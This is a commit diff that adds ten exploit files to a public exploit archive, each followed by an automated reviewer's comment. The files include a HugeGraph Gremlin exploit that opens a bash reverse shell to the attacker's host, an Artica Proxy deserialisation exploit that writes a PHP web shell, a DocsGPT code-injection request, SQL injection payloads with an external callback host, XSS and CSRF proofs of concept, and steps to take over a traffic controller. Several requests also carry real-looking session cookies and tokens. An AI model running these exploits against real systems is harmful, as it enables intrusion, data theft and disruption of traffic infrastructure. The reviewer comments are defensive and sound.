DB: 2025-04-10
10 changes to exploits/shellcodes/ghdb Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Artica Proxy 4.50 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) DocsGPT 0.12.0 - Remote Code Execution
parent
2bc15f74f8
commit
762197db08
10 changed files with 572 additions and 0 deletions
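--- a/exploits/java/webapps/52149.py
+++ b/exploits/java/webapps/52149.py
@@ -0,0 +1,56 @@
+# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
+# Version: Apache HugeGraph 1.0.0 - 1.2.0
+# CVE : CVE-2024–27348
+
+from requests import Request, Session
+import sys
+import json
+
+def title():
+print('''
+
+______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
+/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
+| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
+| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
+\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
+
+[+] Reverse shell
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
+''')
+
+
+def exploit(url, lhost, lport):
+payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
+headers = {
+'Content-Type': 'application/json'}
+s = Session()
+url = url + "/gremlin"
+req = Request('POST', url, json=payload, headers=headers)
+prepped = req.prepare()
+del prepped.headers['Content-Type']
+resp = s.send(prepped,
+verify=False,
+timeout=15)
+print(prepped.headers)
+print(url)
+print(resp.headers)
+print(payload)
+print(resp.status_code)
+print(resp.text)
+
+
+if __name__ == '__main__':
+title()
+if(len(sys.argv) < 4):
+print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
+print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
+print('[+] Do not forget to run the listener: nc -lvp 4444\n')
+exit(0)
+else:
+exploit(sys.argv[1],sys.argv[2],sys.argv[3])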
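Review bot: The `# CVE :` header line writes the identifier with an en dash (`CVE-2024–27348`) rather than an ASCII hyphen, so a grep or scanner keyed on the CVE id will not match this file; the index row in the same commit spells it `CVE-2024-27348`, and the header should read `# CVE : CVE-2024-27348`. The title line says `< 1.2.0` while the Version line says `1.0.0 - 1.2.0`, so the affected range should be stated once and consistently. In `exploit()` the `Content-Type` header is set and then deleted from the prepared request, and `verify=False` is passed, with no comment on either; a one-line comment each would show that both are deliberate. A header note describing the request on the wire (a POST to `/gremlin` whose `gremlin` field reflects into `java.lang.ProcessBuilder` and renames the thread to `VICARIUS`) would give defenders something concrete to search server logs for.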
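--- a/exploits/multiple/webapps/52148.txt
+++ b/exploits/multiple/webapps/52148.txt
@@ -0,0 +1,62 @@
+# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
+Privilege Vulnerability
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/ad-manager/
+# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
+# Version: ADManager Plus Build < 7210
+# Tested against: Build 7203
+# CVE: CVE-2024-24409
+
+
+# Description
+The Modify Computers is a predefined role in ADManager for managing
+computers. If a technician user has the Modify Computers privilege
+over a computer can change the userAccountControl and
+msDS-AllowedToDelegateTo attributes of the computer object. In this
+way, the technician user can set Constrained Kerberos Delegation over
+any computer within the Organizational Unit that the user was
+delegated.
+
+Contrary to what ADManager claims the user who has the Modify
+Computers role can change the privilege of computer objects in the
+Active Directory. The Constrained Kerberos Delegation can be set for
+any service such as CIFS, LDAP, HOST services. Then the user can
+access these services by abusing the Constrained Kerberos Delegation.
+In addition, the Unconstrained Kerberos Delegation can be set over the
+computer objects by changing the userAccountControl attribute.
+Normally, only users that have SeEnableDelegationPrivilege privilege
+can set constrained kerberos delegation. Only members of the
+BUILTIN\Administrators group have this privilege by default. The
+delegated user for an Organizational Unit can not set constrained
+kerberos delegation even if a user has the GenericAll right over a
+computer account, so the delegation process in Active Directory does
+not grant this privilege. However, the technician user can use the
+SeEnableDelegationPrivilege right via the Modify Computers role.
+
+# Vulnerability reasons
+1. ADMP Web App Authorization issue: Assigning a predefined Modify
+Computers role delegates the technician user to modify custom
+attributes of computers unexpectedly. Even though it appears that this
+privilege is not granted in the UI, the Additional Custom Attribute
+property is assigned and this leads to broken access control
+vulnerability.
+
+2. There is no restriction for editing the userAccountControl and
+msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
+application performs changes with domain admin privileges as designed
+so that if we can bypass some restrictions (e.g. format of attribute
+value), our requests are applied with domain admin privileges. This
+way we can edit the attributes userAccountControl and
+msDS-AllowedToDelegateTo.
+
+# Impact
+A technician user elevates privileges from Domain User to Domain
+Admin. For example, the user can set Constrained Kerberos Delegation
+over CLIENT1$ for the CIFS service of the domain controller and access
+the CIFS service. As a result, the user is delegated to manage
+CLIENT1$ but he can access the CIFS service of the domain controller
+impersonating a user unexpectedly.
+
+# Proof Of Concept
+https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409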
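Review bot: The affected range is stated differently in this file and in the index row added by the same commit: the header here says `Build < 7210` (tested on 7203), while the index title reads `ADManager Plus 7210 - Elevation of Privilege`, which suggests build 7210 itself is affected. One of the two should be corrected so readers can tell whether 7210 is the fixed build. The advisory also has no detection or mitigation section. Since it names the two attributes involved, a short closing note would help defenders: audit changes to `userAccountControl` and `msDS-AllowedToDelegateTo` on computer objects (Windows Security events 4742 and 5136) where the change was made by the ADManager service account, and review which technicians hold the Modify Computers role.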
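--- a/exploits/multiple/webapps/52151.txt
+++ b/exploits/multiple/webapps/52151.txt
@@ -0,0 +1,24 @@
+# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
+# Google Dork: N/A
+# Date: 07/09/2024
+# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
+# Vendor Homepage: https://www.q-free.com
+# Software Link: N/A
+# Version: 1.9
+# Tested on: (Intelight x-1) Linux 3.14.57
+# CVE : CVE-2024-38944
+
+## Vulnerability Description
+This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
+Authentication is not required to exploit this vulnerability.
+
+The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
+The issue results from the lack of authentication prior to allowing access to functionality.
+An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
+modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
+
+## Steps to Reproduce
+
+Navigate to the IP address of an identified controller
+When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
+Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.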
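Review bot: The file's classification and version do not match the index row and commit message for the same entry. The header and body describe an authentication bypass in `MaxTime Database Editor 1.9` (1.9.x firmware), while the commit lists it as `Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)`. Anyone triaging by title would look for code execution and a single 1.9.6 build, so the title, the `# Version:` line and the index entry should agree. The advisory gives no mitigation, and since the flaw is an unauthenticated management page, it should at least say the controller's web UI belongs on an isolated management network, with vendor fix information referenced when available.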
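--- a/exploits/php/webapps/52146.py
+++ b/exploits/php/webapps/52146.py
@@ -0,0 +1,78 @@
+# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
+application insecure deserialization (RCE)
+# Google Dork:
+# Date: 23-04-2024
+# Exploit Author: Madan
+# Vendor Homepage: https://artica-proxy.com/
+# Version: 4.40, 4.50
+# Tested on: [relevant os]
+# CVE : CVE-2024-2054
+
+you can also find the exploit on my github repo:
+https://github.com/Madan301/CVE-2024-2054
+
+
+import requests
+import base64
+import urllib3
+from colorama import Fore
+
+print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
+sometimes vary from how artica proxy interface is hosted")
+
+URL = input("Enter url: ")
+if URL[-1]=="/":
+ACTUAL_URL = URL[:-1]
+else:
+ACTUAL_URL = URL
+
+ARTICA_URL = ACTUAL_URL
+
+def check(ARTICA_URL):
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+try:
+check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
+except Exception as e:
+print(Fore.RED+"Could not reach, check URL")
+if check.status_code==200:
+print(Fore.GREEN+"Vulnerable")
+return True
+else:
+print(Fore.RED+"Not Vulnerable")
+
+
+def exploit(ARTICA_URL):
+
+payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
+payload_data = {
+"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
+"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
+"cache_serializer": "json",
+"cache_size": 999999999,
+"cache_data": {
+payload: {
+"cache_date": 0,
+"ttl": 999999999
+}
+}
+}
+}
+
+
+while True:
+PAYLOAD_CMD = input("enter command: ")
+url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+response = requests.get(url, verify=False)
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+if response.status_code == 200:
+cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
+cmd_response = requests.get(cmd_url, verify=False)
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+print(cmd_response.text)
+else:
+print("Failed to execute the payload")
+
+check = check(ARTICA_URL=ACTUAL_URL)
+if check==True:
+exploit(ARTICA_URL=ARTICA_URL)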
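Review bot: `check()` reports "Vulnerable" for any HTTP 200 from `/wizard/wiz.upload.php`, which only shows that the page exists, so the result is prone to false positives and should be worded as "endpoint reachable" unless a version check backs it. When the request raises, the `except` branch prints and then falls through to `check.status_code` with the local `check` unbound; add `return False` there. The header prose (`you can also find the exploit on my github repo:` and the URL under it) is not commented and the first `print(` string is split across two lines, so the file does not parse as Python. The header should also state that `exploit()` overwrites `/usr/share/artica-postfix/wizard/wiz.upload.php` on the appliance and does not restore it, since that is the file an operator would integrity-check or reinstall after a test.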
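--- a/exploits/php/webapps/52147.NA
+++ b/exploits/php/webapps/52147.NA
@@ -0,0 +1,39 @@
+# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
+# Date: 04/28/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://anchorcms.com/
+# Software Link:
+https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
+# Version: latest
+# Tested on: MacOS
+
+# Log in to Anchor CMS.
+# Click on "Create New Post".
+# Fill in the "Title" and enter the following payload in the field
+immediately below:
+# "><script>alert()</script>
+# Go to the homepage, and you will see the alert!
+
+
+### PoC Request ###
+
+POST /anchor/admin/posts/edit/2 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/anchor/admin/posts/edit/2
+Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
+anchorcms=hlko7b1dbdpjgn58himf2obht5
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false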
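Review bot: The header metadata is incomplete against the rest of the commit: `# Version: latest` is not a version (the title and download link both say 0.12.7), and there is no CVE line even though the index row for this file lists CVE-2024-37732. Suggested lines are `# Version: 0.12.7` and `# CVE: CVE-2024-37732`. The captured request also carries the author's `PHPSESSID`, `anchorcms` cookie and `token` value; these should be replaced with placeholders such as `PHPSESSID=<session>` so that no session material is archived. The write-up would be more useful to maintainers if it named the fields that are stored unescaped (`markdown` and `js` in the request body) as the ones needing output encoding.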
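--- a/exploits/php/webapps/52150.NA
+++ b/exploits/php/webapps/52150.NA
@@ -0,0 +1,69 @@
+# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
+via Content Form
+# Date: 8-7-2024
+# Category: Web Application
+# Exploit Author: Jeremia Geraldi Sihombing
+# Version: 2.10.1
+# Tested on: Windows
+# CVE: CVE-2024-39143
+
+Description:
+----------------
+A stored cross-site scripting (XSS) vulnerability exists in
+ResidenceCMS 2.10.1 that allows a low-privilege user to create
+malicious property content with HTML inside it, which acts as a
+stored XSS payload. If this property page is visited by anyone
+including the administrator, then the XSS payload will be triggered..
+
+Steps to reproduce
+-------------------------
+
+1. Login as a low privilege user with property edit capability.
+
+2. Create or Edit one of the user owned property
+(We can user the default property owned by the user).
+3. Fill the content form with XSS payload using the Code View feature.
+Before saving it make sure to go back using the usual view to see if the HTML
+is rendered or not.
+
+Vulnerable parameter name: property[property_description][content]
+
+Example Payload: <img src="x" onerror="alert(document.cookie)">
+
+4. After saving the new property content and clicking the 'Finish Editing',
+go to the page and see the XSS is triggered.
+It is possible to trigger the XSS by using any account or even
+unauthorized account.
+
+Burp Request
+-------------------
+
+POST /en/user/property/7/edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
+Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1111
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/en/user/property/7/edit
+Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
+PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Priority: u=1
+
+property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
+renovated 2-bedroom 2-bathroom
+flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
+renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
+Blvd, Tampa, FL
+33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
+src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg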
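Review bot: The Burp request publishes the author's `REMEMBERME` cookie, `PHPSESSID` and `property[_token]` value verbatim; a remember-me token is credential material and should be replaced with placeholders such as `REMEMBERME=<redacted>` before the file is archived. The example payload in step 3 uses `alert(document.cookie)` while the request body uses `alert(document.domain)`, and the `Accept` header is broken across two lines with the `+` of `application/xhtml+xml` lost, so the request no longer matches what was sent. Step 4's "unauthorized account" presumably means an unauthenticated visitor and should say so. For maintainers, a closing line could say that `property[property_description][content]` needs server-side HTML sanitisation, because the editor's Code View lets the client submit arbitrary markup.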
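--- a/exploits/php/webapps/52152.NA
+++ b/exploits/php/webapps/52152.NA
@@ -0,0 +1,148 @@
+## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
+
+## Author: Sanan Qasimzada
+
+## Date: 06.07.2024
+
+## Vendor: http://churchcrm.io/
+
+## Software: https://github.com/ChurchRM/CRM
+
+## Reference: https://portswigger.net/web-security/sql-injection
+
+
+
+## Description:
+
+In the manual insertion point 1 - parameter `EID` appears to be
+
+vulnerable to SQL injection attacks.
+
+No need for cookies, no need admin authentication and etc.
+
+The attacker easily can steal information from this system by using
+
+this vulnerability.
+
+
+
+STATUS: HIGH Vulnerability - CRITICAL
+
+
+
+[+]Payload:
+
+```mysql
+
+---
+
+Parameter: EID (GET)
+
+Type: boolean-based blind
+
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+
+Payload: EID=(select
+
+load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
+\\ior'))
+
+OR NOT 2407=2407
+
+
+
+Type: time-based blind
+
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: EID=(select
+
+load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
+\\ior'))
+
+AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
+
+
+
+Type: UNION query
+
+Title: MySQL UNION query (UTF8) - 11 columns
+
+Payload: EID=(select
+
+load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
+\\ior'))
+
+UNION ALL SELECT
+
+'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
+
+---
+
+
+
+```
+
+
+
+## Reproduce:
+
+[href](
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1
+)
+
+
+
+## Proof and Exploit:
+
+[href](https://streamable.com/1eqhw2)
+
+
+
+## Time spend:
+
+01:00:00
+
+
+
+
+
+--
+
+System Administrator - Infrastructure Engineer
+
+Penetration Testing Engineer
+
+Exploit developer at
+
+https://packetstormsecurity.com/https://cve.mitre.org/index.html and
+
+https://www.exploit-db.com/
+
+home page: https://www.nu11secur1ty.com/
+
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+
+nu11secur1ty <http://nu11secur1ty.com/>
+
+
+
+--
+
+System Administrator - Infrastructure Engineer
+
+Penetration Testing Engineer
+
+Exploit developer at https://packetstormsecurity.com/
+
+https://cve.mitre.org/index.html
+
+https://cxsecurity.com/ and https://www.exploit-db.com/
+
+0day Exploit DataBase https://0day.today/
+
+home page: https://www.nu11secur1ty.com/
+
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+
+nu11secur1ty <http://nu11secur1ty.com/>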
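Review bot: The advisory never names the page or endpoint that takes the `EID` parameter, so a maintainer or defender cannot tell which request to fix or to look for in access logs; the Description should state the script path. The version in the title (`v4.5.3-121fcc1`) differs from the commit message, which lists this entry as `ChurchCRM 5.9.1 - SQL Injection`, and the `## Software:` link reads `github.com/ChurchRM/CRM`, which looks like a misspelling of the project name. The three payloads embed an external callback hostname under `smotaniak.com`, apparently left over from the scanner run; it should be replaced with a placeholder such as `<oob-host>`. The e-mail signature block is pasted twice and is not part of the advisory.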
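--- a/exploits/php/webapps/52153.NA
+++ b/exploits/php/webapps/52153.NA
@@ -0,0 +1,54 @@
+# Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile
+picture
+# Date: 2024-07-01
+# Exploit Author: Vuln Seeker Cybersecurity Team
+# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
+# Version: <= 1.0.5
+# Tested on: Firefox
+# Contact me: vulns@vulnseeker.org
+
+The plugin does not have CSRF checks in some places, which could allow
+attackers to make logged in users perform unwanted actions via CSRF attacks.
+
+Proof of concept:
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost:10003
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 1093
+Origin: http://localhost:10003
+Sec-GPC: 1
+Connection: close
+Cookie: Cookie
+
+action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
+
+
+CSRF Exploit:
+
+<html>
+<body>
+<form action="http://localhost:10003/wp-admin/admin-ajax.php"
+method="POST">
+<input type="hidden" name="action" value="pzfm_upload_avatar" />
+<input type="hidden" name="imageData"
+value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="
+/>
+<input type="hidden" name="userID" value="1"" />
+<input type="submit" value="Submit request" />
+</form>
+<script>
+history.pushState('', '', '/');
+document.forms[0].submit();
+</script>
+</body>
+</html>
+
+Profile picture of user 1 will be changed in the dashboard
+http://localhost:10003/dashboard/?dashboard=profile
+
+Reference:
+https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/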
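Review bot: The description says only that CSRF checks are missing "in some places", although the proof of concept shows exactly one: the `pzfm_upload_avatar` AJAX action, called with a caller-supplied `userID` and no nonce. The text should name that action, and should note that `userID` lets the request change another user's avatar, which is a missing authorisation check on top of the CSRF. For plugin maintainers the remediation worth stating is nonce verification on the handler (`check_ajax_referer`) plus a check that the current user may edit the supplied `userID`. The form markup has a stray quote in `value="1""`, which should be `value="1"`. The header has no CVE line, so readers must follow the WPScan reference to find out whether one exists.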
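--- a/exploits/python/webapps/52145.py
+++ b/exploits/python/webapps/52145.py
@@ -0,0 +1,33 @@
+# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
+# Date: 09/04/2025
+# Exploit Author: Shreyas Malhotra (OSMSEC)
+# Vendor Homepage: https://github.com/arc53/docsgpt
+# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
+# Version: 0.8.1 through 0.12.0
+# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
+# CVE: CVE-2025-0868
+
+import requests
+
+# TARGET CONFIG
+TARGET = "http://10.0.2.15:7091" # Change this
+
+# Malicious payload string - carefully escaped - modify the python code if necessary
+malicious_data = (
+'user=1&source=reddit&name=other&data={"source":"reddit",'
+'"client_id":"1111","client_secret":1111,"user_agent":"111",'
+'"search_queries":[""],"number_posts":10,'
+'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
+)
+
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+try:
+response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
+print(f"[+] Status Code: {response.status_code}")
+print("[+] Response Body:")
+print(response.text)
+except Exception as e:
+print(f"[-] Error sending request: {e}")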
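Review bot: The `requests.post(...)` call has no `timeout`, so the script hangs indefinitely against an unresponsive host, and the handler catches bare `Exception`, which also hides programming errors. Pass `timeout=15` and catch `requests.RequestException` instead. The header says nothing about what the script leaves behind: the proof marker is the file `/tmp/test` created on the server, which should be documented so a tester removes it and a defender knows which artifact to look for. The comments also never name the weakness itself, which from the payload appears to be the `data` field of `/api/remote` being evaluated as Python rather than parsed as JSON. One line saying so would tell maintainers where the fix belongs.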
|
@ -5471,6 +5471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java,,2016-06-06,2016-06-14,1,,,,,http://www.exploit-db.comapache-continuum-1.4.2-bin.tar.gz,
|
||||
49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,,2021-01-08,2021-01-08,1,CVE-2020-17519,,,,,
|
||||
48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,,2020-11-02,2020-11-02,0,,,,,,
|
||||
52149,exploits/java/webapps/52149.py,"Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)",2025-04-09,"Yesith Alvarez",webapps,java,,2025-04-09,2025-04-09,0,CVE-2024-27348,,,,,
|
||||
